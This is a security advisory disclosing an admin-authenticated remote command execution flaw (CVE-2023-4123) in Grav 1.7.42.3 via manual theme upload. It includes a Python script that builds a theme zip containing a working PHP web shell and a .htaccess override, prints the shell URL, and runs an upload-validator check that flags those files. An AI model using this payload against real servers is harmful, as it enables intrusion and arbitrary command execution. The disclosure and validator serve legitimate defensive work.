grav 1.7.42.3 - Remote Command Execution
Severity: 8.0 (High)
Discovered by
Offensive Team, Fluid Attacks
Summary
Full name
grav 1.7.42.3 - Remote Command Execution
Code name
State
Private
Release date
Aug 11, 2023
Affected product
grav 1.7.42.3
Affected version(s)
Version 1.7.42.3
Vulnerability name
Remote Command Execution
Vulnerability type
Remotely exploitable
Yes
CVSS v3.1 vector string
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H/E:H/RL:U/RC:C
CVSS v3.1 base score
8.0
Exploit available
Yes
CVE ID(s)
CVE-2023-4123
Description
Grav allows a user with admin privileges to execute commands on the server by abusing the manual theme install functionality.
Vulnerability
A Remote Command Execution (RCE) vulnerability has been identified in Grav. An admin user, or any user with Super User privileges, can upload theme packages manually through the admin panel. This functionality does not check the integrity of the uploaded package or perform any other validation of its contents, so the package can carry a PHP shell. Because Grav's default configuration prevents PHP files inside the themes folder from being executed, the package also needs to include a .htaccess file in the theme folder that overrides that restriction.

Exploitation
In the Grav admin panel, go to Tools -> Direct Install and upload the theme package containing the payload:

After that, request the uploaded theme's path to reach the shell.
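The following script is an added example, not Fluid Attacks' proof of concept and not Grav's own code. It builds a theme archive of the shape the advisory describes (a minimal theme plus a .htaccess and a PHP file), derives the URL of the dropped file under Grav's user/themes/ directory, and also shows the kind of package inspection the Direct Install upload currently lacks. The theme slug "demo", the file contents, the validation policy in inspect_theme_zip(), and the choice of a .htaccess that turns the rewrite engine off (which starts a new per-directory mod_rewrite context, so the blocking rules from Grav's root .htaccess no longer apply there) are all assumptions; the page does not show the exact .htaccess the researchers used.

```python
"""Build a theme package like the one the advisory describes (PHP file plus
.htaccess) and inspect such packages the way an upload validator could.

Added example, not Fluid Attacks' PoC or Grav's own code.  Assumptions:
the theme slug "demo", the file contents below, the validation policy in
inspect_theme_zip(), and that a .htaccess turning the rewrite engine off
cancels the root .htaccess rewrite rules for that directory (per-directory
mod_rewrite contexts are not inherited by default).
"""
import io
import zipfile
from urllib.parse import quote

THEME = "demo"  # assumed theme slug; Grav installs it under user/themes/<slug>/

# Minimal manifest so the archive installs as a theme (contents assumed).
BLUEPRINTS = f"""name: {THEME}
version: 1.0.0
description: demo theme
type: theme
"""

# Starts a new per-directory rewrite context, so the RewriteRules in Grav's
# root .htaccess that block direct access to user/**/*.php no longer apply
# inside this folder (assumed; the page does not show the file used).
HTACCESS = "RewriteEngine Off\n"

# The command-execution payload the advisory refers to as a "php shell".
SHELL_PHP = "<?php system($_GET['cmd']); ?>\n"

# Files a theme upload has no legitimate reason to carry (assumed policy).
SERVER_CONFIG_FILES = {".htaccess", ".user.ini", "web.config", "php.ini"}


def build_theme_zip(theme: str = THEME, malicious: bool = True) -> bytes:
    """Return a zip with a minimal theme; malicious=True adds the two extra files."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{theme}/blueprints.yaml", BLUEPRINTS)
        # A theme's own class file is the one PHP file a Grav theme normally has.
        zf.writestr(f"{theme}/{theme}.php",
                    "<?php\nnamespace Grav\\Theme;\n"
                    f"class {theme.capitalize()} extends \\Grav\\Common\\Theme {{}}\n")
        zf.writestr(f"{theme}/templates/default.html.twig", "{{ page.content }}\n")
        if malicious:
            zf.writestr(f"{theme}/.htaccess", HTACCESS)
            zf.writestr(f"{theme}/shell.php", SHELL_PHP)
    return buf.getvalue()


def inspect_theme_zip(data: bytes, theme: str) -> list[str]:
    """Return the findings an upload validator should reject the package for.

    Policy (assumed, stricter than what the advisory says Grav applies):
    no web-server config files, no PHP beyond the theme class file, no
    traversal in member names, and the manifest must be present.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        if f"{theme}/blueprints.yaml" not in names:
            findings.append("missing blueprints.yaml")
        for name in names:
            parts = name.split("/")
            if name.startswith("/") or ".." in parts:
                findings.append(f"path traversal: {name}")
                continue
            base = parts[-1]
            if base in SERVER_CONFIG_FILES:
                findings.append(f"server config file: {name}")
            elif (base.lower().endswith((".php", ".phtml", ".phar"))
                  and name != f"{theme}/{theme}.php"):
                findings.append(f"unexpected PHP file: {name}")
    return findings


def shell_url(base_url: str, theme: str = THEME, cmd: str = "id") -> str:
    """URL of the dropped file under Grav's theme directory after a Direct Install."""
    return f"{base_url.rstrip('/')}/user/themes/{theme}/shell.php?cmd={quote(cmd)}"


if __name__ == "__main__":
    package = build_theme_zip()
    with open(f"{THEME}.zip", "wb") as fh:  # the archive uploaded via Tools -> Direct Install
        fh.write(package)
    print("validator findings:", inspect_theme_zip(package, THEME))
    print("then request:", shell_url("http://grav.example", cmd="id"))
```

Running the script writes demo.zip next to it and prints the two findings a validator would raise against it, followed by the URL to request once the package has been installed. The benign variant (build_theme_zip(malicious=False)) produces no findings, which is the distinction the upload handler would need to make.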

Our security policy
We have reserved the ID CVE-2023-4123 to refer to this issue from now on.
System Information
Version: grav 1.7.42.3
Operating System: Linux
Mitigation
There is currently no patch available for this vulnerability.
References
Vendor page https://github.com/getgrav/grav
Timeline
Vulnerability discovered
Jul 26, 2023
Vendor contacted
Jul 26, 2023
Public disclosure
Aug 11, 2023